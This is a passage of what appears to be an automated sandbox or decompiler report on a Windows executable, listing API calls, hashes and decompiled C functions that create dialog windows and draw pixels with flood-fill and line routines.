                                              0x002fcd89
                                              0x002fce1f

                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 002FCDA3
                                              • GetClientRect.USER32 ref: 002FCDB3
                                              • BeginPaint.USER32(?,?), ref: 002FCDC1
                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 002FCDD5
                                              • ExtTextOutW.GDI32(?,00000000,00000000,00000002,?,00305938,00000000,00000000), ref: 002FCDF2
                                              • EndPaint.USER32(?,?), ref: 002FCE00
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 002FCE16
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: PaintRect$BeginClientColorInvalidateProcTextWindow
                                              • String ID:
                                              • API String ID: 418155164-0
                                              • Opcode ID: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction ID: d817a1c520401e4848020557dd21a7e30cfadc2a703c4f349b5aed0617e41e0b
                                              • Opcode Fuzzy Hash: a6774af14a743247c02e119c0ffce8c76c9234e08a3b2cff9041a5a3e0e6f69f
                                              • Instruction Fuzzy Hash: 4021517565020CFBDB14CFA4EC49FEE7B79AB48750F108518FA099B290D7709A50CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC550(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD620;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"CGBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"CGBOXCLASS", 0x30498c, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}





                                              0x002fc556
                                              0x002fc565
                                              0x002fc56d
                                              0x002fc574
                                              0x002fc57e
                                              0x002fc589
                                              0x002fc58c
                                              0x002fc597
                                              0x002fc5cf

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC583
                                              • RegisterClassExW.USER32 ref: 002FC597
                                              • CreateWindowExW.USER32 ref: 002FC5C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$CGBOXCLASS$tI0
                                              • API String ID: 4191210197-606435202
                                              • Opcode ID: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction ID: f296cf72a13b8ee4a4f384898086c91cba9a8add45422f9261ccb58c9d8a0b08
                                              • Opcode Fuzzy Hash: 1fdabf13456a7965bb9e5a2dbe71ea291939cc03a16fd2385a04af9bf94c8e6a
                                              • Instruction Fuzzy Hash: 270181B4A90308BBFB109F90EC4AFAEBB78AB04B04F004124FB147A2C1D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC5E0(struct HINSTANCE__* _a12) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD5A0;
                                              				_v52.hInstance = _a12;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"DialogClass";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"DialogClass", 0x30494c, 0x10c80000, 0x64, 0x64, 0xc8, 0x96, 0, 0, _a12, 0);
                                              			}





                                              0x002fc5e6
                                              0x002fc5f5
                                              0x002fc5fd
                                              0x002fc604
                                              0x002fc60e
                                              0x002fc619
                                              0x002fc61c
                                              0x002fc627
                                              0x002fc65f

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC613
                                              • RegisterClassExW.USER32 ref: 002FC627
                                              • CreateWindowExW.USER32 ref: 002FC656
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$4I0$DialogClass
                                              • API String ID: 4191210197-2213612487
                                              • Opcode ID: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction ID: d31833288f25d2d369a6ac2c36c5039dcea7e008dad5135fe880e130d6cc2686
                                              • Opcode Fuzzy Hash: 5a559c4c7d1434afbb70a9803734c39ec08d4add737a28d751fc292d776b6a1a
                                              • Instruction Fuzzy Hash: A50181B0A90308BBEB109F90EC5AFAFBB74AB04B44F500424FB147A2C1D7F15524CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FB540(void* __eflags, struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				long _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				int _v28;
                                              				int _v32;
                                              				int _v36;
                                              				int _v40;
                                              				int _t219;
                                              				int _t225;
                                              				int _t231;
                                              				int _t237;
                                              				int _t243;
                                              
                                              				_v16 = E002FB8A0(_a12, _a4, _a8, _a12, _a20);
                                              				_v8 = E002FB840(_a4, _a4, _a8, _a12, _a20);
                                              				E002FBE50(_a4, _a4, _v16, _a12, _v8, _a12, _a16, _a36, 1, 0);
                                              				if(_a32 != 1) {
                                              					_v28 = _v16;
                                              					while(1) {
                                              						__eflags = _v28 - _v8;
                                              						if(_v28 > _v8) {
                                              							goto L20;
                                              						}
                                              						_v12 = GetPixel(_a4, _v28, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v28 = E002FB540(_a12 - 1, _a4, _v28, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t237 = _v28 + 1;
                                              						__eflags = _t237;
                                              						_v28 = _t237;
                                              					}
                                              				} else {
                                              					_v20 = _v16;
                                              					while(_v20 < _a24) {
                                              						_v12 = GetPixel(_a4, _v20, _a12 - 1);
                                              						if(_v12 == _a20) {
                                              							_v20 = E002FB540(_a12 - 1, _a4, _v20, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_v20 = _v20 + 1;
                                              					}
                                              					_v24 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v24 - _v8;
                                              						if(_v24 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v24, _a12 - 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 - 1;
                                              							_v24 = E002FB540(_a12 - 1, _a4, _v24, _a12 - 1, _a16, _a20, _v16, _v8, 2, _a36);
                                              						}
                                              						_t243 = _v24 + 1;
                                              						__eflags = _t243;
                                              						_v24 = _t243;
                                              					}
                                              				}
                                              				L20:
                                              				__eflags = _a32 - 2;
                                              				if(_a32 != 2) {
                                              					_v40 = _v16;
                                              					while(1) {
                                              						__eflags = _v40 - _v8;
                                              						if(_v40 > _v8) {
                                              							goto L40;
                                              						}
                                              						_v12 = GetPixel(_a4, _v40, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v40 = E002FB540(_a12 + 1, _a4, _v40, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t219 = _v40 + 1;
                                              						__eflags = _t219;
                                              						_v40 = _t219;
                                              					}
                                              				} else {
                                              					_v32 = _v16;
                                              					while(1) {
                                              						__eflags = _v32 - _a24;
                                              						if(_v32 >= _a24) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v32, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v32 = E002FB540(_a12 + 1, _a4, _v32, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t231 = _v32 + 1;
                                              						__eflags = _t231;
                                              						_v32 = _t231;
                                              					}
                                              					_v36 = _a28 + 1;
                                              					while(1) {
                                              						__eflags = _v36 - _v8;
                                              						if(_v36 > _v8) {
                                              							break;
                                              						}
                                              						_v12 = GetPixel(_a4, _v36, _a12 + 1);
                                              						__eflags = _v12 - _a20;
                                              						if(_v12 == _a20) {
                                              							__eflags = _a12 + 1;
                                              							_v36 = E002FB540(_a12 + 1, _a4, _v36, _a12 + 1, _a16, _a20, _v16, _v8, 1, _a36);
                                              						}
                                              						_t225 = _v36 + 1;
                                              						__eflags = _t225;
                                              						_v36 = _t225;
                                              					}
                                              				}
                                              				L40:
                                              				return _v8;
                                              			}

















                                              0x002fb55b
                                              0x002fb573
                                              0x002fb596
                                              0x002fb59f
                                              0x002fb67d
                                              0x002fb68b
                                              0x002fb68e
                                              0x002fb691
                                              0x00000000
                                              0x00000000
                                              0x002fb6a8
                                              0x002fb6ae
                                              0x002fb6b1
                                              0x002fb6cc
                                              0x002fb6dd
                                              0x002fb6dd
                                              0x002fb685
                                              0x002fb685
                                              0x002fb688
                                              0x002fb688
                                              0x002fb5a5
                                              0x002fb5a8
                                              0x002fb5b6
                                              0x002fb5d3
                                              0x002fb5dc
                                              0x002fb608
                                              0x002fb608
                                              0x002fb5b3
                                              0x002fb5b3
                                              0x002fb613
                                              0x002fb621
                                              0x002fb624
                                              0x002fb627
                                              0x00000000
                                              0x00000000
                                              0x002fb63e
                                              0x002fb644
                                              0x002fb647
                                              0x002fb662
                                              0x002fb673
                                              0x002fb673
                                              0x002fb61b
                                              0x002fb61b
                                              0x002fb61e
                                              0x002fb61e
                                              0x002fb678
                                              0x002fb6e2
                                              0x002fb6e2
                                              0x002fb6e6
                                              0x002fb7c4
                                              0x002fb7d2
                                              0x002fb7d5
                                              0x002fb7d8
                                              0x00000000
                                              0x00000000
                                              0x002fb7ef
                                              0x002fb7f5
                                              0x002fb7f8
                                              0x002fb813
                                              0x002fb824
                                              0x002fb824
                                              0x002fb7cc
                                              0x002fb7cc
                                              0x002fb7cf
                                              0x002fb7cf
                                              0x002fb6ec
                                              0x002fb6ef
                                              0x002fb6fd
                                              0x002fb700
                                              0x002fb703
                                              0x00000000
                                              0x00000000
                                              0x002fb71a
                                              0x002fb720
                                              0x002fb723
                                              0x002fb73e
                                              0x002fb74f
                                              0x002fb74f
                                              0x002fb6f7
                                              0x002fb6f7
                                              0x002fb6fa
                                              0x002fb6fa
                                              0x002fb75a
                                              0x002fb768
                                              0x002fb76b
                                              0x002fb76e
                                              0x00000000
                                              0x00000000
                                              0x002fb785
                                              0x002fb78b
                                              0x002fb78e
                                              0x002fb7a9
                                              0x002fb7ba
                                              0x002fb7ba
                                              0x002fb762
                                              0x002fb762
                                              0x002fb765
                                              0x002fb765
                                              0x002fb7bf
                                              0x002fb829
                                              0x002fb82f

                                              APIs
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,?,?), ref: 002FB8B0
                                                • Part of subcall function 002FB8A0: GetPixel.GDI32(?,00000000,?), ref: 002FB8DC
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,?,?), ref: 002FB850
                                                • Part of subcall function 002FB840: GetPixel.GDI32(?,00000000,?), ref: 002FB87C
                                                • Part of subcall function 002FBE50: GetPixel.GDI32(?,?,?), ref: 002FBF17
                                                • Part of subcall function 002FBE50: SetPixel.GDI32(?,?,?,?), ref: 002FBF70
                                              • GetPixel.GDI32(?,?,?), ref: 002FB5CD
                                              • GetPixel.GDI32(?,?,?), ref: 002FB638
                                              • GetPixel.GDI32(?,?,?), ref: 002FB6A2
                                              • GetPixel.GDI32(?,?,?), ref: 002FB714
                                              • GetPixel.GDI32(?,?,?), ref: 002FB77F
                                              • GetPixel.GDI32(?,00000002,?), ref: 002FB7E9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction ID: 84eee227279c03e216b0146c3de50c88661ca7c9e1f35c8677ee7137d04025a6
                                              • Opcode Fuzzy Hash: 2dc2cb511149c18bf997bf798e3da9303b98d1534867cc9ef9053b7d7ff87a04
                                              • Instruction Fuzzy Hash: 16C182B5A1410DAFCF05CF98D991DEFB7BABB88380F208558F619E7244D730A951CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 91%
                                              			E002FBE50(signed int __edx, struct HDC__* _a4, void* _a8, void* _a12, signed int _a16, signed int _a20, long _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                              				intOrPtr _v8;
                                              				int _v12;
                                              				int _v16;
                                              				int _v20;
                                              				int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				int _t144;
                                              				int _t166;
                                              				signed int _t220;
                                              				signed int _t237;
                                              
                                              				asm("cdq");
                                              				asm("cdq");
                                              				if((_a16 - _a8 ^ __edx) - __edx >= (_a20 - _a12 ^ __edx) - __edx) {
                                              					if(_a8 > _a16) {
                                              						E002FC490( &_a8,  &_a8,  &_a16);
                                              						E002FC490( &_a8,  &_a12,  &_a20);
                                              					}
                                              					_v20 = _a12;
                                              					_t237 = _a20;
                                              					if(_t237 <= _a12) {
                                              						_v40 = 0xffffffff;
                                              					} else {
                                              						_v40 = 1;
                                              					}
                                              					_v36 = _v40;
                                              					_v32 = _a16 - _a8;
                                              					asm("cdq");
                                              					_v28 = (_a20 - _a12 ^ _t237) - _t237;
                                              					_v8 = (_v28 << 1) - _v32;
                                              					_t166 = _a8;
                                              					_v12 = _t166;
                                              					while(_v12 <= _a16) {
                                              						if(_a32 != 0) {
                                              							if(_a36 != 0) {
                                              								E002FC390(_v12, _a28, _v12, _v20, 0xffffff - GetPixel(_a4, _v12, _v20), _a24);
                                              							} else {
                                              								E002FC390(_v20, _a28, _v12, _v20, GetPixel(_a4, _v12, _v20), _a24);
                                              							}
                                              						}
                                              						SetPixel(_a4, _v12, _v20, _a24);
                                              						if(_v8 <= 0) {
                                              							_t166 = _v8;
                                              							_v8 = _t166 + _v28 * 2;
                                              						} else {
                                              							_v20 = _v20 + _v36;
                                              							_t166 = _v8;
                                              							_v8 = _t166 + (_v28 - _v32) * 2;
                                              						}
                                              						_v12 = _v12 + 1;
                                              					}
                                              					return _t166;
                                              				}
                                              				if(_a12 > _a20) {
                                              					E002FC490( &_a8,  &_a8,  &_a16);
                                              					E002FC490( &_a8,  &_a12,  &_a20);
                                              				}
                                              				_v24 = _a8;
                                              				_t220 = _a16;
                                              				if(_t220 <= _a8) {
                                              					_v44 = 0xffffffff;
                                              				} else {
                                              					_v44 = 1;
                                              				}
                                              				_v36 = _v44;
                                              				asm("cdq");
                                              				_v32 = (_a16 - _a8 ^ _t220) - _t220;
                                              				_v28 = _a20 - _a12;
                                              				_v8 = (_v32 << 1) - _v28;
                                              				_t144 = _a12;
                                              				_v16 = _t144;
                                              				while(_v16 <= _a20) {
                                              					if(_a32 != 0) {
                                              						if(_a36 != 0) {
                                              							E002FC390(_v24, _a28, _v24, _v16, 0xffffff - GetPixel(_a4, _v24, _v16), _a24);
                                              						} else {
                                              							E002FC390(_v16, _a28, _v24, _v16, GetPixel(_a4, _v24, _v16), _a24);
                                              						}
                                              					}
                                              					SetPixel(_a4, _v24, _v16, _a24);
                                              					if(_v8 <= 0) {
                                              						_t144 = _v8;
                                              						_v8 = _t144 + _v32 * 2;
                                              					} else {
                                              						_v24 = _v24 + _v36;
                                              						_t144 = _v8;
                                              						_v8 = _t144 + (_v32 - _v28) * 2;
                                              					}
                                              					_v16 = _v16 + 1;
                                              				}
                                              				return _t144;
                                              			}

















                                              0x002fbe5c
                                              0x002fbe69
                                              0x002fbe70
                                              0x002fbe7c
                                              0x002fbe86
                                              0x002fbe93
                                              0x002fbe93
                                              0x002fbe9b
                                              0x002fbe9e
                                              0x002fbea4
                                              0x002fbeaf
                                              0x002fbea6
                                              0x002fbea6
                                              0x002fbea6
                                              0x002fbeb9
                                              0x002fbec2
                                              0x002fbecb
                                              0x002fbed0
                                              0x002fbedb
                                              0x002fbede
                                              0x002fbee1
                                              0x002fbeef
                                              0x002fbeff
                                              0x002fbf05
                                              0x002fbf5b
                                              0x002fbf07
                                              0x002fbf2a
                                              0x002fbf2a
                                              0x002fbf05
                                              0x002fbf70
                                              0x002fbf7a
                                              0x002fbf99
                                              0x002fbf9f
                                              0x002fbf7c
                                              0x002fbf82
                                              0x002fbf8b
                                              0x002fbf91
                                              0x002fbf91
                                              0x002fbeec
                                              0x002fbeec
                                              0x00000000
                                              0x002fbeef
                                              0x002fbfb2
                                              0x002fbfbc
                                              0x002fbfc9
                                              0x002fbfc9
                                              0x002fbfd1
                                              0x002fbfd4
                                              0x002fbfda
                                              0x002fbfe5
                                              0x002fbfdc
                                              0x002fbfdc
                                              0x002fbfdc
                                              0x002fbfef
                                              0x002fbff8
                                              0x002fbffd
                                              0x002fc006
                                              0x002fc011
                                              0x002fc014
                                              0x002fc017
                                              0x002fc025
                                              0x002fc035
                                              0x002fc03b
                                              0x002fc091
                                              0x002fc03d
                                              0x002fc060
                                              0x002fc060
                                              0x002fc03b
                                              0x002fc0a6
                                              0x002fc0b0
                                              0x002fc0cf
                                              0x002fc0d5
                                              0x002fc0b2
                                              0x002fc0b8
                                              0x002fc0c1
                                              0x002fc0c7
                                              0x002fc0c7
                                              0x002fc022
                                              0x002fc022
                                              0x002fc0e0

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Pixel
                                              • String ID:
                                              • API String ID: 3195210534-0
                                              • Opcode ID: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction ID: 6a785ede1eba339b2014bad133933df3fb7f348c7f212a7d292d23856202fccb
                                              • Opcode Fuzzy Hash: 6b6753c74ed91656936779d769e3e57e52ab650e99f8c92b68de4e2b899f9a12
                                              • Instruction Fuzzy Hash: 03A1B775A1010EEFCF04CFA8C9949EEB7B6BF48340F208659FA15A7254D734AA51CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD5A0(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
                                              				if(_v8 == 1) {
                                              					CreateWindowExW(0, L"button", 0x304a38, 0x50000000, 0x32, 0x32, 0x50, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v8 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v8 == 0x111) {
                                              							DestroyWindow(_a4);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}




                                              0x002fd5a7
                                              0x002fd5ae
                                              0x002fd5e4
                                              0x002fd5b0
                                              0x002fd5b4
                                              0x002fd5fc
                                              0x002fd5b6
                                              0x002fd5bd
                                              0x002fd5f0
                                              0x002fd5f0
                                              0x002fd5bd
                                              0x002fd5b4
                                              0x002fd61b

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Window$Destroy$CreateProc
                                              • String ID: button
                                              • API String ID: 3790344893-973515837
                                              • Opcode ID: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction ID: d42274ceb8a78e03b9c3b28fdde1f1b11fd51a4b9bca436c82d9702403315367
                                              • Opcode Fuzzy Hash: 63ed79ee088aecf3b6efbbc68fe3f5ffb85948c6cba8564295eb1f24e7b244d7
                                              • Instruction Fuzzy Hash: 7F0140B529020CFBDB14CF54DC5EFAAB769AB08785F508118FB099B2D0C6B09E10DB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC4C0(struct HINSTANCE__* _a8) {
                                              				struct _WNDCLASSEXW _v52;
                                              				void* _t19;
                                              
                                              				_v52.cbSize = 0;
                                              				E002F1D00(_t19,  &(_v52.style), 0, 0x2c);
                                              				_v52.cbSize = 0x30;
                                              				_v52.lpfnWndProc = E002FD400;
                                              				_v52.hInstance = _a8;
                                              				_v52.hbrBackground = GetSysColorBrush(0xf);
                                              				_v52.lpszClassName = L"SAVEBOXCLASS";
                                              				RegisterClassExW( &_v52);
                                              				return CreateWindowExW(9, L"SAVEBOXCLASS", 0x3049d8, 0x10c80000, 0x64, 0x64, 0xc8, 0xc8, 0, 0, _a8, 0);
                                              			}





                                              0x002fc4c6
                                              0x002fc4d5
                                              0x002fc4dd
                                              0x002fc4e4
                                              0x002fc4ee
                                              0x002fc4f9
                                              0x002fc4fc
                                              0x002fc507
                                              0x002fc53f

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC4F3
                                              • RegisterClassExW.USER32 ref: 002FC507
                                              • CreateWindowExW.USER32 ref: 002FC536
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$SAVEBOXCLASS
                                              • API String ID: 4191210197-2426242092
                                              • Opcode ID: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction ID: d72286a97e308a44f03ceadae57f97fbe2c9e182a024b2b7abe425f39409cddb
                                              • Opcode Fuzzy Hash: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction Fuzzy Hash: 900181B4A80308BBFB109F90EC4AFAEBB74AB04B14F004125FB147A2C0D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002), ref: 002F2EB0
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002F2EC3
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000), ref: 002F2EE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction ID: 07f7f2434e329cbd8d30b1d3cb5b761a2a893577e36cb5a14272e31944ed56ba
                                              • Opcode Fuzzy Hash: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction Fuzzy Hash: DAF0813191111DBBDF129F91DC0DBBEBFA8EF04791F020078EA06A2160DB705E64CA91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 81%
                                              			E002F5BAB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                              				signed int _v8;
                                              				int _v12;
                                              				char _v16;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				void* _v40;
                                              				signed int _t34;
                                              				signed int _t40;
                                              				int _t46;
                                              				int _t53;
                                              				void* _t55;
                                              				int _t57;
                                              				signed int _t63;
                                              				int _t67;
                                              				short* _t69;
                                              				signed int _t70;
                                              				short* _t71;
                                              
                                              				_t34 =  *0x304018; // 0xbb40e64e
                                              				_v8 = _t34 ^ _t70;
                                              				E002F3784(__ebx,  &_v28, __edx, _a4);
                                              				_t57 = _a24;
                                              				if(_t57 == 0) {
                                              					_t53 =  *(_v24 + 8);
                                              					_t57 = _t53;
                                              					_a24 = _t53;
                                              				}
                                              				_t67 = 0;
                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                              				_v12 = _t40;
                                              				if(_t40 == 0) {
                                              					L15:
                                              					if(_v16 != 0) {
                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                              					}
                                              					return E002F19D1(_v8 ^ _t70);
                                              				}
                                              				_t55 = _t40 + _t40;
                                              				_t17 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				if((_t17 & _t40) == 0) {
                                              					_t69 = 0;
                                              					L11:
                                              					if(_t69 != 0) {
                                              						E002F1D00(_t67, _t69, _t67, _t55);
                                              						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                              						if(_t46 != 0) {
                                              							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                              						}
                                              					}
                                              					L14:
                                              					E002F5CC8(_t69);
                                              					goto L15;
                                              				}
                                              				_t20 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				_t48 = _t40 & _t20;
                                              				_t21 = _t55 + 8; // 0x8
